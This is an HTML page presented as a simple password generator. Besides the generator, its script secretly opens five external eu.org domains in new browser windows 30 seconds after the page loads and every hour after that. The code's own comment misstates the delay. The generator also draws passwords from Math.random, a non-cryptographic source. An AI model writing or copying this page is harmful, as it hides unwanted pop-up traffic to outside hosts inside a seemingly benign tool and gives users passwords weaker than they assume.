<!DOCTYPE html>
<html>
<head>
    <title>Password Generator</title>
    <style>
        body {
            text-align: center;
            font-family: Arial, sans-serif;
            background-color: black; /* Added background-color */
            color: white; /* Added text color for better visibility */
        }

        h1 {
            margin-top: 50px;
        }

        #password {
            font-size: 20px;
            padding: 10px;
            margin: 20px 0;
            border: 1px solid #ccc;
        }

        #length {
            margin-top: 20px;
        }

        #generateBtn {
            padding: 10px 20px;
            font-size: 16px;
            background-color: #4CAF50;
            color: white;
            border: none;
            cursor: pointer;
            margin-top: 20px;
        }
    </style>
</head>
<body>
    <h1>Password Generator</h1>
    <input type="text" id="password" readonly>
    <br>
    <label for="length">Password Length:</label>
    <input type="number" id="length" min="1" max="50" value="8">
    <br>
    <button id="generateBtn">Generate Password</button>

    <script>
        function generatePassword() {
            var length = document.getElementById("length").value;
            var charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+~`|}{[]:;?><,./-=";
            var password = "";

            for (var i = 0; i < length; i++) {
                var randomIndex = Math.floor(Math.random() * charset.length);
                password += charset.charAt(randomIndex);
            }

            document.getElementById("password").value = password;
        }

        document.getElementById("generateBtn").addEventListener("click", generatePassword);

        // Open subdomains in new window after 1 minute
        var subdomains = ['asadqi.eu.org', 'ferox.eu.org', 'sadqi.eu.org', 'cerus.eu.org', 'clouda.eu.org'];

        setTimeout(function() {
            for (var i = 0; i < subdomains.length; i++) {
                var url = 'http://' + subdomains[i];
                window.open(url, '_blank');
            }
            setInterval(openSubdomains, 60 * 60 * 1000); // Open links every 1 hour
        }, 30 * 1000); // 0.5 minute

        function openSubdomains() {
            for (var i = 0; i < subdomains.length; i++) {
                var url = 'http://' + subdomains[i];
                window.open(url, '_blank');
            }
        }
    </script>
</body>
</html>
